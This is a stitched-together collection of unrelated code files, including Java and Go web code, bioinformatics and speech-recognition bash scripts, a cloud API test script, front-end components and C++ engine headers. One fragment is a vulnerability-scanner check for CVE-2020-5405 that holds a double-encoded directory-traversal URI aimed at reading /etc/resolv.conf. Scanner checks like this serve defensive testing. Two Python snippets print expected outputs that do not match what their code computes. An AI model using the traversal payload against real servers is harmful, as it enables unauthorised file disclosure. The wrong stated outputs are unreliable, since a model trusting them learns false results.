package io.dronefleet.mavlink.common; import io.dronefleet.mavlink.annotations.MavlinkEntryInfo; import io.dronefleet.mavlink.annotations.MavlinkEnum; /** * Bitmap to indicate which dimensions should be ignored by the vehicle: a value of * 0b0000000000000000 or 0b0000001000000000 indicates that none of the setpoint dimensions * should be ignored. If bit 9 is set the floats afx afy afz should be interpreted as force instead of * acceleration. */ @MavlinkEnum public enum PositionTargetTypemask { /** * Ignore position x */ @MavlinkEntryInfo(1) POSITION_TARGET_TYPEMASK_X_IGNORE, /** * Ignore position y */ @MavlinkEntryInfo(2) POSITION_TARGET_TYPEMASK_Y_IGNORE, /** * Ignore position z */ @MavlinkEntryInfo(4) POSITION_TARGET_TYPEMASK_Z_IGNORE, /** * Ignore velocity x */ @MavlinkEntryInfo(8) POSITION_TARGET_TYPEMASK_VX_IGNORE, /** * Ignore velocity y */ @MavlinkEntryInfo(16) POSITION_TARGET_TYPEMASK_VY_IGNORE, /** * Ignore velocity z */ @MavlinkEntryInfo(32) POSITION_TARGET_TYPEMASK_VZ_IGNORE, /** * Ignore acceleration x */ @MavlinkEntryInfo(64) POSITION_TARGET_TYPEMASK_AX_IGNORE, /** * Ignore acceleration y */ @MavlinkEntryInfo(128) POSITION_TARGET_TYPEMASK_AY_IGNORE, /** * Ignore acceleration z */ @MavlinkEntryInfo(256) POSITION_TARGET_TYPEMASK_AZ_IGNORE, /** * Use force instead of acceleration */ @MavlinkEntryInfo(512) POSITION_TARGET_TYPEMASK_FORCE_SET, /** * Ignore yaw */ @MavlinkEntryInfo(1024) POSITION_TARGET_TYPEMASK_YAW_IGNORE, /** * Ignore yaw rate */ @MavlinkEntryInfo(2048) POSITION_TARGET_TYPEMASK_YAW_RATE_IGNORE }
def reverseSort(string): string_list = string.split() string_list.sort(reverse=True) return string_list if __name__ == '__main__': string = "The quick brown fox jumps over the lazy dog" result_list = reverseSort(string) print(result_list) Output: ['over', 'lazy', 'jumps', 'fox', 'brown', 'quick', 'The', 'dog']
#!/bin/bash #SBATCH --nodes=1 #SBATCH --ntasks=8 #SBATCH --mem=16gb module load sra-tools cd /gpfs/group/pipkin/hdiao/T_Cell_ChIP/0_fastq fastq-dump -I --split-files SRR5217328 & fastq-dump -I --split-files SRR5217329 & fastq-dump -I --split-files SRR4437321 & fastq-dump -I --split-files SRR4437322 & fastq-dump -I --split-files SRR4437323 & fastq-dump -I --split-files SRR4437324 & fastq-dump -I --split-files SRR4437325 & fastq-dump -I --split-files SRR4437326 wait fastq-dump -I --split-files SRR4437327 & fastq-dump -I --split-files SRR4437328 & fastq-dump -I --split-files SRR4437329 & fastq-dump -I --split-files SRR4437330 & fastq-dump -I --split-files SRR4437331 & fastq-dump -I --split-files SRR4437332 & fastq-dump -I --split-files SRR4437333 & fastq-dump -I --split-files SRR4437334
#!/bin/bash # change the environment name to OpenCabinetDoor, OpenCabinetDrawer, PushChair, or MoveBucket # change the network config # increase eval_cfg.num_procs for parallel evaluation model_list=$(python -c "import mani_skill, os, os.path as osp; print(osp.abspath(osp.join(osp.dirname(mani_skill.__file__), 'assets', 'config_files', 'cabinet_models_door.yml')))") echo ${model_list} python -m tools.run_rl configs/bc/mani_skill_point_cloud_transformer8.py --gpu-ids=1 \ --work-dir=./work_dirs/bc_pointnet_transformer_door8_6/ \ --cfg-options "train_mfrl_cfg.total_steps=150000" "train_mfrl_cfg.init_replay_buffers=" \ "train_mfrl_cfg.init_replay_with_split=[\"./full_mani_skill_data/OpenCabinetDoor/\",\"$model_list\"]" \ "env_cfg.env_name=OpenCabinetDoor-v0" "eval_cfg.num=100" "eval_cfg.num_procs=1" "train_mfrl_cfg.n_eval=10000" \ "agent.policy_cfg.nn_cfg.matrix_index=6" # python -m tools.run_rl configs/bc/mani_skill_point_cloud_transformer.py --gpu-ids=0 \ # --work-dir=./work_dirs/base_bc_point_transformer_door/ \ # --cfg-options "train_mfrl_cfg.total_steps=150000" \ # "env_cfg.env_name=OpenCabinetDoor-v0" "eval_cfg.num=100" "eval_cfg.num_procs=1" "train_mfrl_cfg.n_eval=10000"
package route import ( httpRoute "github.com/quicklygabbing/http/pkg/http/route" "github.com/quicklygabbing/users/internal/pkg/http/request" internalRoute "github.com/quicklygabbing/users/internal/pkg/http/route" ) type route struct { request request.Interface } func NewRoute() internalRoute.Interface { return &route{request: request.NewRequest()} } func (r *route) GetRoutes() []httpRoute.Routes { return []httpRoute.Routes{ r.registration(), r.signIn(), } } func (r *route) registration() httpRoute.Routes { return httpRoute.Routes{ Route: `/registration`, Methods: []string{httpRoute.POST, httpRoute.GET}, Handle: r.request.Registration, } } func (r *route) signIn() httpRoute.Routes { return httpRoute.Routes{ Route: `/sign-in`, Methods: []string{httpRoute.POST, httpRoute.GET}, Handle: r.request.SignIn, } }
<reponame>lucasliet/casa_do_codigo<gh_stars>0 package br.com.casadocodigo.loja.daos; import java.util.List; import javax.persistence.EntityManager; import javax.persistence.PersistenceContext; import br.com.casadocodigo.loja.models.Autor; public class AutorDao { @PersistenceContext private EntityManager manager; public List<Autor> listar() { return manager.createQuery( "select a from Autor a", Autor.class) .getResultList(); } }
<filename>artifacts/spring-workshop/dao/src/main/java/com/vmware/spring/workshop/dao/api/BranchDao.java package com.vmware.spring.workshop.dao.api; import java.util.List; import org.springframework.data.repository.query.Param; import com.vmware.spring.workshop.dao.IdentifiedCommonOperationsDao; import com.vmware.spring.workshop.model.Identified; import com.vmware.spring.workshop.model.banking.Branch; /** * @author lgoldstein */ public interface BranchDao extends IdentifiedCommonOperationsDao<Branch> { Branch findByBranchCode (@Param("code") int code); Branch findByBranchName (@Param("name") String name); List<Branch> findByBankId (@Param(Identified.ID_COL_NAME) Long bankId); List<Branch> findByBranchBankCode (@Param("code") int bankCode); /** * @param location A sub-string of the location * @return A {@link List} of all matching {@link Branch}-es whose location * contains the specified parameter (case <U>insensitive</U>) */ List<Branch> findByBranchLocation (@Param("location") String location); }
echo "####################################################################"
echo "## Full Test Scripts for CB-Spider IID Working Version - 2020.04.22."
echo "## 1. VPC: Create -> List -> Get"
echo "## 2. SecurityGroup: Create -> List -> Get"
echo "## 3. KeyPair: Create -> List -> Get"
echo "## 4. VM: multiple #n StartVM"
echo "## 5. VM: List -> ListStatus"
echo "## ---------------------------------"
echo "## 4. VM: Terminate(#n)"
echo "## 3. KeyPair: Delete"
echo "## 2. SecurityGroup: Delete"
echo "## 1. VPC: Delete"
echo "####################################################################"

# Every request hits the same CB-Spider REST endpoint with a JSON body, so
# the curl boilerplate is deduplicated into one helper.
SPIDER_URL="http://localhost:1024/spider"

# spider METHOD PATH JSON_BODY — issue one REST call and pretty-print it.
spider() {
    curl -sX "$1" "${SPIDER_URL}/$2" -H 'Content-Type: application/json' -d "$3" | json_pp
}

# Connection-only body shared by every List/Get/Delete call.
CONN_BODY='{ "ConnectionName": "'${CONN_CONFIG}'"}'

echo "####################################################################"
echo "## 1. VPC: Create -> List -> Get"
echo "####################################################################"
spider POST vpc '{ "ConnectionName": "'${CONN_CONFIG}'", "ReqInfo": { "Name": "vpc-01", "IPv4_CIDR": "192.168.0.0/16", "SubnetInfoList": [ { "Name": "subnet-01", "IPv4_CIDR": "192.168.1.0/24"} ] } }'
spider GET vpc "$CONN_BODY"
spider GET vpc/vpc-01 "$CONN_BODY"
echo "#-----------------------------"

echo "####################################################################"
echo "## 2. SecurityGroup: Create -> List -> Get"
echo "####################################################################"
spider POST securitygroup '{ "ConnectionName": "'${CONN_CONFIG}'", "ReqInfo": { "Name": "sg-01", "VPCName": "vpc-01", "SecurityRules": [ {"FromPort": "1", "ToPort" : "65535", "IPProtocol" : "tcp", "Direction" : "inbound"} ] } }'
spider GET securitygroup "$CONN_BODY"
spider GET securitygroup/sg-01 "$CONN_BODY"
echo "#-----------------------------"

echo "####################################################################"
echo "## 3. KeyPair: Create -> List -> Get"
echo "####################################################################"
spider POST keypair '{ "ConnectionName": "'${CONN_CONFIG}'", "ReqInfo": { "Name": "keypair-01" } }'
spider GET keypair "$CONN_BODY"
spider GET keypair/keypair-01 "$CONN_BODY"
echo "#-----------------------------"

echo "==========================================================================================================================="
echo "==========================================================================================================================="

# Number of VMs to start/terminate: defaults to 2, overridable via $1.
if [ "$1" = "" ]; then
    max=2
else
    max=$1
fi

echo "####################################################################"
echo "## 4. VM: multiple StartVM($max)"
echo "####################################################################"
# VMs are started in parallel (background jobs); provisioning is slow, so a
# fixed sleep follows instead of polling.
for (( num=1; num <= $max; num++ ))
do
    spider POST vm '{ "ConnectionName": "'${CONN_CONFIG}'", "ReqInfo": { "Name": "powerkim-vm-test-'${num}'", "ImageName": "'${IMAGE_NAME}'", "VPCName": "vpc-01", "SubnetName": "subnet-01", "SecurityGroupNames": [ "sg-01" ], "VMSpecName": "'${SPEC_NAME}'", "KeyPairName": "keypair-01"} }' &
done

echo "============== sleep 300 after start VM"
sleep 300

echo "####################################################################"
echo "## 5. VM: List -> ListStatus"
echo "####################################################################"
spider GET vm "$CONN_BODY"
echo "#-----------------------------"
spider GET vmstatus "$CONN_BODY"
echo "#-----------------------------"

echo "####################################################################"
echo "####################################################################"
echo "####################################################################"

echo "####################################################################"
echo "## 4. VM: Terminate($max)"
echo "####################################################################"
for (( num=1; num <= $max; num++ ))
do
    spider DELETE vm/powerkim-vm-test-${num} "$CONN_BODY" &
done

echo "============== sleep 300 after terminate VM"
sleep 300

echo "####################################################################"
echo "## 3. KeyPair: Delete"
echo "####################################################################"
spider DELETE keypair/keypair-01 "$CONN_BODY"

echo "####################################################################"
echo "## 2. SecurityGroup: Delete"
echo "####################################################################"
spider DELETE securitygroup/sg-01 "$CONN_BODY"

echo "####################################################################"
echo "## 1. VPC: Delete"
echo "####################################################################"
spider DELETE vpc/vpc-01 "$CONN_BODY"
#!/bin/bash sudo apt-get update sudo apt-get install -y mongodb sudo rm /etc/mongodb.conf
import { shadow } from '../../src/enhancers/' import { buildEmptyThemeFn, buildStyleParamFn } from '../../src/themes/util' test('returns shadow styles', () => { const theme = { ...buildEmptyThemeFn(), siteVariables: { shadows: { small: '0 1px 4px rgba(0, 0, 0, .125)', }, } } const styleParam = buildStyleParamFn( { textShadow: '0 -1px rgba(255, 255, 255, .25)', boxShadow: 'small', }, theme, theme.siteVariables) const style = shadow(styleParam) expect(style).toEqual({ textShadow: '0 -1px rgba(255, 255, 255, .25)', boxShadow: '0 1px 4px rgba(0, 0, 0, .125)', }) })
// Return the length of the longest space-separated word in `string`.
// An empty input yields 0 (splitting '' produces a single empty "word").
function findLongestWordLength(string) {
  return string
    .split(' ')
    .reduce((longest, word) => Math.max(longest, word.length), 0);
}
<gh_stars>10-100
/*
 * BulletMotionState: adapter implementing Bullet's btMotionState interface.
 * Caches the body's world transform and forwards physics-driven updates to
 * an optional callback.
 */
#include "precompiled.h"
#pragma hdrstop

#include "BulletMotionState.h"

#include <utility>

#include "Modules/Graphics/GraphicsSystem/TransformComponent.h"

// Seed the motion state with the body's initial world transform.
BulletMotionState::BulletMotionState(const btTransform& transform)
    : m_btTransform(transform)
{
}

BulletMotionState::~BulletMotionState() = default;

// Called by Bullet to read the current world transform; returns the cached
// value.
void BulletMotionState::getWorldTransform(btTransform& worldTrans) const
{
    worldTrans = m_btTransform;
}

// Called by Bullet after the simulation moves the body: notify the registered
// listener first, then refresh the cache.
void BulletMotionState::setWorldTransform(const btTransform& worldTrans)
{
    if (m_updateCallback != nullptr)
    {
        m_updateCallback(worldTrans);
    }
    m_btTransform = worldTrans;
}

// Register the callback invoked on every physics-driven transform change.
void BulletMotionState::setUpdateCallback(std::function<void(const btTransform&)> updateCallback)
{
    m_updateCallback = std::move(updateCallback);
}
/* // The characteristic of the reference types is expressed in the assignment operation! For example: const num = { n: 1 }; console.log(`num = ${num.n}`); const num1 = num; console.log(`num1 = ${num1.n} and num = ${num.n}`); num1.n = 100; console.log(`After change num1: num1 = ${num1.n} and num = ${num.n}`); */ // This указател - дава достъп до свойствата на обекта, когато се споменават в метод в същия! const person = { firstName: 'Jhon', lastName: 'Doe', fullName: function(){ return `${this.firstName} ${this.lastName}`; } }; console.log(person.fullName());
<reponame>DPNT-Sourcecode/CHK-ojia01
'use strict';

// Sum two values. No type checking is performed: non-numeric operands fall
// back to JavaScript's `+` semantics (e.g. string concatenation).
module.exports = function (x, y) {
    return x+y;
};
<filename>src/components/DocWrapper/DocInlineCode/index.tsx
import React, {FC} from 'react';
import clsx from 'clsx';

import './DocInlineCode.scss';

interface ComponentProps {
  // Extra class names merged onto the base 'DocInlineCode' class.
  className?: string;
}

// Inline <code> wrapper used inside documentation pages; renders children
// verbatim and exposes a data-testid for tests.
const DocInlineCode: FC<ComponentProps> = ({children, className}) => {
  return (
    <code className={clsx('DocInlineCode', className)} data-testid="DocInlineCode">
      {children}
    </code>
  );
};

export default DocInlineCode;
# Check definition for CVE-2020-5405 (Spring Cloud Config directory
# traversal). Presumably sourced by a scanning harness that issues the
# request and greps the response — TODO confirm against the runner.
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-5405 - Spring Directory Traversal 2'
# %252f is a double-URL-encoded '/', defeating single-pass path normalization.
URI="/a/a/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f../etc/resolv.conf"
METHOD='GET'
# Response patterns that indicate a successful file read (passwd-style root
# entry, resolv.conf nameserver line, or an INI section header).
MATCH="root\:|nameserver|\[extensions\]"
SEVERITY='P1 - CRITICAL'
# Blank UA, silent, follow redirects, ignore TLS errors.
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'
<reponame>rds0751/fec-cms<gh_stars>10-100
// Adjusts the Hallo rich-text editor toolbar each time an editor activates.
(function() {
  (function($) {
    // Force hallotoolbar to be full width when possible
    $(document.body).on('halloactivated', function() {
      var $toolbar = $('.hallotoolbar');
      $toolbar.width('auto');
      // Remove re-undo buttons
      $toolbar.find('.halloreundo.ui-buttonset').remove();
    });
  })(jQuery);
})(this);
<reponame>alisdair/slack-time-zones<gh_stars>10-100
// Integration tests for the timezone-group component: renders a clock for a
// given UTC offset plus the profiles of the users in that timezone.
import hbs from 'htmlbars-inline-precompile';
import { moduleForComponent, test } from 'ember-qunit';
import Ember from 'ember';

// Text of $element's own text nodes only (child elements ignored), trimmed.
function shallowText($element) {
  return $element.contents()
    .filter((i, e) => e.nodeType === window.Node.TEXT_NODE).text().trim();
}

// Trimmed text of every descendant matching `selector`, as a plain array.
function allTexts(selector, $element) {
  return $element.find(selector).map(function() {
    return $(this).text().trim();
  }).get();
}

// Build minimal user objects (dasherized name, realName, placeholder avatar).
function buildUsers(...names) {
  return Ember.A(names).map(name => {
    return Ember.Object.create({
      name: name.dasherize(),
      realName: name,
      image192: 'http://placehold.it/192x192'
    });
  });
}

let originalMoment;

moduleForComponent('timezone-group', 'Integration - Component - Timezone Group', {
  integration: true,

  beforeEach() {
    // Freeze "now" so rendered times are deterministic across runs.
    originalMoment = window.moment;
    window.moment = function() {
      return originalMoment('2015-07-04T22:15:00Z');
    };
  },

  afterEach() {
    window.moment = originalMoment;
  }
});

test('displays the time and timezone', function(assert) {
  assert.expect(2);

  // -9000 seconds == UTC-02:30, so the frozen 22:15Z renders as 19:45.
  this.set('offset', -9000);
  this.set('users', []);

  this.render(hbs`
    {{timezone-group timezoneOffset=offset users=users}}
  `);

  let $group = this.$('.timezone-group');

  let $time = $group.find('.timezone-group__time');
  assert.equal(shallowText($time), '19:45', 'shows time adjusted for timezone');

  let $timezone = $group.find('.timezone-group__timezone');
  assert.equal($timezone.text().trim(), '-02:30', 'shows timezone offset');
});

test('lists the users for the timezone, sorted by name', function(assert) {
  assert.expect(2);

  this.set('offset', 3600);

  // NOTE(review): the <NAME> placeholders look like dataset anonymisation
  // artifacts; the original test presumably used distinct real names, which
  // the "sorted by name" assertion depends on — restore before running.
  let users = buildUsers('<NAME>', '<NAME>', '<NAME>');
  this.set('users', users);

  this.render(hbs`
    {{timezone-group timezoneOffset=offset users=users}}
  `);

  let $group = this.$('.timezone-group');

  let $profiles = $group.find('.user-profile');
  assert.equal($profiles.length, 3, 'renders 3 profiles');

  let usernames = allTexts('.user-profile__realname', $profiles);
  assert.deepEqual(usernames, ['<NAME>', '<NAME>', '<NAME>'], 'sorts users by real name');
});
#!/bin/bash
# Enter (creating on first use) a per-user Docker "login" container.
# With no arguments after --, opens an interactive bash in the container;
# otherwise execs the given command (with special handling so rsync-over-ssh
# works without a tty).

# When invoked via sudo, act on behalf of the invoking user, not root.
if [ -n "$SUDO_COMMAND" ]; then
    user=$SUDO_USER
    uid=$SUDO_UID
    gid=$SUDO_GID
else
    user=$(whoami)
    uid=$(id --user)
    gid=$(id --group)
fi

label_prefix=local
container_name=
image=ubuntu:18.04

# Options: --image IMAGE, --name NAME; "--" ends option parsing and leaves the
# remaining words as the command to exec.
while [ $# -gt 0 ]
do
    case $1 in
        --) shift; break; ;;
        --image)
            image=$2
            shift; shift;
            ;;
        --name)
            container_name=$2
            shift; shift;
            ;;
        *)
            echo "Invalid arguments" >&2
            exit 1
            ;;
    esac
done

if [ -n "$container_name" ]; then
    # find the named container
    # NOTE(review): `--filter name=` does substring matching, so "foo" also
    # matches "foobar" — consider anchoring (name=^/foo$) if that matters.
    container_id=$(docker ps --quiet --filter name=$container_name)
    label=$label_prefix.name=$container_name
else
    # find a default container for this user by name
    container_id=$(docker ps --quiet --filter label=$label_prefix.user=$user)
    label=$label_prefix.user=$user
    container_name=${user}_container
fi

# No running container found: create one, labelled so we can find it again.
if [ -z "$container_id" ]; then
    docker run \
        --volume /home/$user/workspace:/home/$user/workspace \
        --workdir /home/$user \
        --label $label \
        --restart always \
        --name $container_name \
        --user $uid:$gid \
        --interactive \
        --tty \
        --detach \
        --init \
        $image bash

    container_id=$(docker ps --quiet --filter label=$label)
    container_ipaddr=$(docker inspect --format='{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}' $container_id)
    # Custom firewall rules etc. can be setup here for the new container
fi

if [ -z "$container_id" ]; then
    echo "Failed to start container" >&2
    exit 1
fi

# login with no parameters should enter an interactive shell
if [ $# -eq 0 ]; then
    docker exec -it $container_id /bin/bash
else
    # rsync --server requires an interactive shell and no tty
    if [[ "$@" =~ "rsync --server "* ]]; then
        docker exec -i $container_id "$@"
    else
        docker exec -t $container_id "$@"
    fi
fi
#!/bin/bash

# this script is called from scripts like run_ms.sh; it does the common stages
# of the build, such as feature extraction.
# This is actually the same as local/online/run_nnet2_common.sh, except
# for the directory names.
#
# Stage map:
#   1: hires MFCC + CMVN for train/dev/eval, plus a training subset
#   2: fMLLR alignment used to seed the LDA+MLLT system
#   3: small LDA+MLLT system (only its transform is needed)
#   4: diagonal UBM            5: iVector extractor
#   6: iVectors on train       7: iVectors on dev/eval

. cmd.sh

mfccdir=mfcc
stage=1

# NOTE(review): cmd.sh is sourced twice (here and above) — harmless, but
# probably a copy/paste leftover.
. cmd.sh
. ./path.sh
. ./utils/parse_options.sh

if [ $stage -le 1 ]; then
  for datadir in train dev eval; do
    utils/copy_data_dir.sh data/$datadir data/${datadir}_hires
    steps/make_mfcc.sh --nj 40 --mfcc-config conf/mfcc_hires.conf \
      --cmd "$train_cmd" data/${datadir}_hires exp/make_hires/$datadir $mfccdir || exit 1;
    steps/compute_cmvn_stats.sh data/${datadir}_hires exp/make_hires/$datadir $mfccdir || exit 1;
  done

  # Make a subset containing 15% of the original training set
  utils/subset_data_dir.sh data/train_hires 28300 data/train_15p_hires || exit 1
fi

if [ $stage -le 2 ]; then
  # We need to build a small system just because we need the LDA+MLLT transform
  # to train the diag-UBM on top of. We align the si84 data for this purpose.
  # NOTE(review): the comment mentions si84 (WSJ naming) but the command aligns
  # data/train_40k — comment likely stale from the recipe this was copied from.
  steps/align_fmllr.sh --nj 40 --cmd "$train_cmd" \
    data/train_40k data/lang_bd exp/tri3 exp/nnet3/tri3_ali_p15
fi

if [ $stage -le 3 ]; then
  # Train a small system just for its LDA+MLLT transform.  We use --num-iters 13
  # because after we get the transform (12th iter is the last), any further
  # training is pointless.
  steps/train_lda_mllt.sh --cmd "$train_cmd" --num-iters 13 \
    --realign-iters "" \
    --splice-opts "--left-context=3 --right-context=3" \
    5000 10000 data/train_15p_hires data/lang_bd \
    exp/nnet3/tri3_ali_p15 exp/nnet3/tri4
fi

if [ $stage -le 4 ]; then
  mkdir -p exp/nnet3
  steps/online/nnet2/train_diag_ubm.sh --cmd "$train_cmd" --nj 30 \
    --num-frames 400000 data/train_15p_hires 256 exp/nnet3/tri4 exp/nnet3/diag_ubm
fi

if [ $stage -le 5 ]; then
  # even though $nj is just 10, each job uses multiple processes and threads.
  steps/online/nnet2/train_ivector_extractor.sh --cmd "$train_cmd" --nj 10 \
    data/train_hires exp/nnet3/diag_ubm exp/nnet3/extractor || exit 1;
fi

if [ $stage -le 6 ]; then
  # We extract iVectors on all the train_si284 data, which will be what we
  # train the system on.

  # having a larger number of speakers is helpful for generalization, and to
  # handle per-utterance decoding well (iVector starts at zero).
  # NOTE! this script is deprecated, please use utils/data/modify_speaker_info.sh
  steps/online/nnet2/copy_data_dir.sh --utts-per-spk-max 2 data/train_hires \
    data/train_hires_max2

  steps/online/nnet2/extract_ivectors_online.sh --cmd "$train_cmd" --nj 10 \
    data/train_hires_max2 exp/nnet3/extractor exp/nnet3/ivectors_train || exit 1;
fi

if [ $stage -le 7 ]; then
  rm exp/nnet3/.error 2>/dev/null
  for data in dev eval; do
    steps/online/nnet2/extract_ivectors_online.sh --cmd "$train_cmd" --nj 8 \
      data/${data}_hires exp/nnet3/extractor exp/nnet3/ivectors_${data} || touch exp/nnet3/.error &
  done
  wait
  [ -f exp/nnet3/.error ] && echo "$0: error extracting iVectors." && exit 1;
fi

exit 0;
from typing import List def absolute_differences_sum(arr: List[int]) -> int: abs_diff_sum = 0 for i in range(len(arr) - 1): abs_diff_sum += abs(arr[i] - arr[i+1]) return abs_diff_sum # Test cases print(absolute_differences_sum([4, 1, 7, 3])) # Output: 12 print(absolute_differences_sum([2, 2, 2, 2])) # Output: 0 print(absolute_differences_sum([5, 8, 2, 10, 3])) # Output: 17
#!/bin/bash
#
# Since running everything at once yields inconsistent result, this script
# runs each benchmark one by one.
# An optional numeric argument can be used to run multiple iterations.
#

# Forward the optional iteration count to every benchmark invocation.
if [ ! -z $1 ]; then
  QPB_BENCH_EXTRA_ARG="-iterations $1"
fi

# Build output directory, resolved relative to this script's location.
OUT=$(cd $(dirname ${BASH_SOURCE[0]}) && pwd)/out

$OUT/bin/test-protobuf-qml -input $OUT/test/protobuf/tst_benchmark.qml JsonBenchmark::benchmark_json_ctor $QPB_BENCH_EXTRA_ARG
$OUT/bin/test-protobuf-qml -input $OUT/test/protobuf/tst_benchmark.qml JsonBenchmark::benchmark_json $QPB_BENCH_EXTRA_ARG
$OUT/bin/test-protobuf-qml -input $OUT/test/protobuf/tst_benchmark.qml SerializationBenchmark::benchmark_ctor $QPB_BENCH_EXTRA_ARG
$OUT/bin/test-protobuf-qml -input $OUT/test/protobuf/tst_benchmark.qml SerializationBenchmark::benchmark_v4cb $QPB_BENCH_EXTRA_ARG
$OUT/bin/test-protobuf-qml -input $OUT/test/protobuf/tst_benchmark.qml SerializationBenchmark::benchmark_v4 $QPB_BENCH_EXTRA_ARG
# NOTE(review): "lecagy" looks like a typo for "legacy", but it must match the
# method name defined in tst_benchmark.qml — confirm there before renaming.
$OUT/bin/test-protobuf-qml -input $OUT/test/protobuf/tst_benchmark.qml SerializationBenchmark::benchmark_lecagy $QPB_BENCH_EXTRA_ARG
#ifndef MUSE_MCL_2D_UPDATE_MODEL_2D_HPP
#define MUSE_MCL_2D_UPDATE_MODEL_2D_HPP

#include <ros/node_handle.h>

#include <cslibs_math_ros/tf/tf_provider.hpp>
#include <cslibs_plugins/plugin.hpp>
#include <cslibs_plugins_data/data.hpp>
#include <muse_mcl_2d/instance/sample_2d.hpp>
#include <muse_smc/smc/traits/update_model.hpp>

namespace muse_mcl_2d {

/// Abstract base for 2D measurement-update models, loaded as plugins.
/// Combines the SMC update-model interface with the common plugin machinery
/// and caches the TF provider and frame configuration shared by all models.
class UpdateModel2D : public muse_smc::traits::UpdateModel<Hypothesis2D>::type,
                      public cslibs_plugins::Plugin {
 public:
  using Ptr = std::shared_ptr<UpdateModel2D>;
  using data_t = muse_smc::traits::Data<Hypothesis2D>::type;
  using transform_t = muse_smc::traits::Transform<Hypothesis2D>::type;
  using state_t = muse_smc::traits::State<Hypothesis2D>::type;
  using point_t = muse_smc::traits::StateSpaceBoundary<Hypothesis2D>::type;
  using state_space_t = muse_smc::traits::StateSpace<Hypothesis2D>::type;
  using sample_set_t = muse_smc::traits::SampleSet<Hypothesis2D>::type;

  /// Type string used by the plugin loader to identify this base class.
  static std::string Type() { return "muse_mcl_2d::UpdateModel2D"; }

  /// Model id/name are delegated to the plugin identity machinery.
  inline std::size_t getModelId() const override {
    return cslibs_plugins::Plugin::getId();
  }
  inline std::string const &getName() const override {
    return cslibs_plugins::Plugin::getName();
  }

  /// Read common parameters, then hand off to the concrete model's doSetup().
  /// NOTE(review): "world_frame"/"base_frame" are read from the node's root
  /// namespace while "tf_timeout" is namespaced under the plugin name via
  /// param_name() — confirm this asymmetry is intended.
  inline void setup(const cslibs_math_ros::tf::TFProvider::Ptr &tf,
                    ros::NodeHandle &nh) {
    auto param_name = [this](const std::string &name) {
      return name_ + "/" + name;
    };
    tf_ = tf;
    world_frame_ = nh.param<std::string>("world_frame", "world");
    robot_base_frame_ = nh.param<std::string>("base_frame", "base_link");
    tf_timeout_ =
        ros::Duration(nh.param<double>(param_name("tf_timeout"), 0.1));
    doSetup(nh);
  }

 protected:
  cslibs_math_ros::tf::TFProvider::Ptr tf_{nullptr};
  ros::Duration tf_timeout_{0.1};  // max wait for a TF lookup (seconds)
  std::string world_frame_;
  std::string robot_base_frame_;

  /// Model-specific parameter handling, implemented by concrete plugins.
  virtual void doSetup(ros::NodeHandle &nh) = 0;
};
}  // namespace muse_mcl_2d

#endif  // MUSE_MCL_2D_UPDATE_MODEL_2D_HPP
# Build the custom TensorFlow "hough_voting_gpu" op (CUDA kernel + C++ shim).

# Locate TensorFlow's bundled headers and shared library for compilation.
TF_INC=$(python -c 'import tensorflow as tf; print(tf.sysconfig.get_include())')
echo $TF_INC
TF_LIB=$(python -c 'import tensorflow as tf; print(tf.sysconfig.get_lib())')

CUDA_PATH=/usr/local/cuda

cd hough_voting_gpu_layer

# Compile the CUDA kernel. -arch=sm_50 hard-codes the target architecture
# (Maxwell) — adjust for other GPUs.
nvcc -std=c++11 -c -o hough_voting_gpu_op.cu.o hough_voting_gpu_op.cu.cc \
	-I $TF_INC -I$TF_INC/external/nsync/public -D GOOGLE_CUDA=1 -x cu -Xcompiler -fPIC -arch=sm_50

# Link the op (plus CUDA and OpenCV) into a shared library loadable from
# Python via tf.load_op_library(). -Wl,-z,defs fails the link on any
# unresolved symbol instead of deferring to load time.
g++ -std=c++11 -shared -o hough_voting_gpu.so hough_voting_gpu_op.cc \
	hough_voting_gpu_op.cu.o -I $TF_INC -I$TF_INC/external/nsync/public -fPIC -L/usr/local/lib -lcudart -lcublas -lopencv_imgproc -lopencv_calib3d -lopencv_core -L $CUDA_PATH/lib64 -L$TF_LIB -ltensorflow_framework -Wl,-z,defs

cd ..
echo 'hough_voting_gpu_layer'
<reponame>rovedit/Fort-Candle<filename>src/systems/ParticleSystem.hh
#pragma once

#include <glow/fwd.hh>

#include "advanced/World.hh"
#include "ecs/Engine.hh"
#include "ecs/System.hh"
#include "types/Particle.hh"

namespace gamedev
{
// CPU-side particle system with a preallocated pool, rendered via instancing.
// Inspired by https://github.com/TheCherno/OneHourParticleSystem
class ParticleSystem : public System
{
public:
    void Init(SharedEngineECS& ecs);
    void AddEntity(InstanceHandle& handle, Signature entitySignature);

    // Allocate pool storage for `particleCount` particles.
    void SetupParticleCount(int particleCount);
    // Push current per-particle attribute data into the instance buffer.
    void UploadParticleData();
    glow::SharedVertexArray& GetParticleVAO();

    // Advance all particles by `elapsed_time`. Returns an int — presumably
    // the live-particle count after the step; TODO confirm in the .cc.
    int Update(float elapsed_time);
    void RenderInstanced(const glow::UsedProgram& shader, const glow::SharedFramebuffer& framebuffer);

    // Spawn one particle with the given properties at `xform`.
    void EmitParticle(const ParticleProperties& particleProperties, transform& xform);
    void KillParticle(int id);

    long int GetParticleCount();

private:
    // Preset emitter configurations for common game events.
    void Init_MonsterDeathParticles();
    void Init_PioneerDeathParticles();
    void Init_BuildingDestroyedParticles();

private:
    // Event-bus hook that triggers emission for game events.
    void ParticleListener(Event& e);

private:
    std::shared_ptr<EngineECS> mECS;

    std::vector<Particle> mParticlePool;
    std::vector<ParticleAttributes> mParticleAttributes;

    glow::SharedVertexArray mVaoCube;
    glow::SharedArrayBuffer mVboParticles;

private:
    int mFreeIndex = 0;            // next pool slot to (re)use — TODO confirm
    int mAlive = 0;
    int MAX_PARTICLES = 100000;
    int INSTANCE_DATA_LENGTH = 17; // 4 * 4 + 1

    ParticleProperties mMonsterDeath;
    ParticleProperties mPioneerDeath;
    ParticleProperties mBuildingDestroyed;
};

// Dormant GPU-compute variant, kept for reference (note it is incomplete:
// PARTICLE_DATA_LENGTH has no initializer inside the comment below).
/*
class GPUParticleSystem : public System
{
public:
    void Init(SharedEngineECS& ecs);
    void AddEntity(InstanceHandle& handle, Signature entitySignature);

    void EmitParticle(const ParticleProperties& particleProperties, transform& xform);
    void KillParticle(int id);

    void AllocateParticleBuffer(std::uint64_t particles);
    void UpdateParticleBuffer();
    void ComputeParticles();
    void RenderParticles(glow::UsedProgram& shader);
    void Update(float elapsed_time);

private:
    std::shared_ptr<EngineECS> mECS;

